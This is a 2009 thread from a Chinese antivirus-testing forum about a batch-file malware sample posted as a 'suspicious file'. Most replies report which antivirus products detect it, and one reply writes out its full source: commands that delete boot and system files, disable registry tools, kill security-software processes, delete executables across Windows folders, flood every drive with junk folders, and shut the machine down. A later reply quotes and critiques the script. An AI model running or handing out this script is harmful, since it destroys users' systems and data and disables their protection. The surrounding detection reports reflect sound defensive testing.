可爱的批处理~（自己又修改了一下，变种见21楼）

显示全部楼层 · 发表于 2009-1-29 10:07:19

全都0

更新日志和变种结果见21楼

[ 本帖最后由 youba 于 2009-2-27 11:44 编辑 ]

显示全部楼层 · 发表于 2009-1-29 10:11:31

'BDS/Killfiles.GA.1' [backdoor]

显示全部楼层 · 发表于 2009-1-29 10:13:02

干掉微点的

就这个批处理也能干掉？
木马清道夫miss

显示全部楼层 · 发表于 2009-1-29 10:27:05

发生下列错误：

请求的对象被感染，发现下列病毒 Trojan.BAT.KillFiles.ga

显示全部楼层 · 发表于 2009-1-29 10:29:31

。。。直接拦截

显示全部楼层 · 发表于 2009-1-29 10:42:11

del c:\ntldr
del c:\*sys
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
taskkill /f /im MPSVC1.exe/t
taskkill /f /im MPSVC2.exe/t
taskkill /f /im MPSVC.exe/t
del C:\windows\*.exe
del C:\windows\system32\*.exe
del C:\windows\system32\*.cpl
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
Shutdown
date 2099-10-10

显示全部楼层 · 发表于 2009-1-29 10:48:44

Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: http://bbs.kafan.cn/attachment.p ... 3f&t=1233197292
Information: Contains a recognition pattern of the (harmful) BDS/Killfiles.GA.1 back-door program

Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.60, VDF 7.1.1.197

显示全部楼层 · 发表于 2009-1-29 10:53:45

Ka8 直接Kill

显示全部楼层 · 发表于 2009-1-29 11:10:01

Roboon：费尔 Trojan.BAT.KillFiles.ga.khvv

显示全部楼层 · 发表于 2009-1-29 11:17:38

原帖由 za1012 于 2009-1-29 10:42 发表
del c:\ntldr
del c:\*sys
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
t ...

LZ的这个批处理的第二行应该是少写了一个点：del c:\*.sys

批处理这个东西如果也防不住的话，就没法说了。。
另外，最后一段光建立文件夹有什么意思？？给你建立又怎样？？有本事建立可执行文件啊。。。

[可疑文件] 可爱的批处理~（自己又修改了一下，变种见21楼）

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块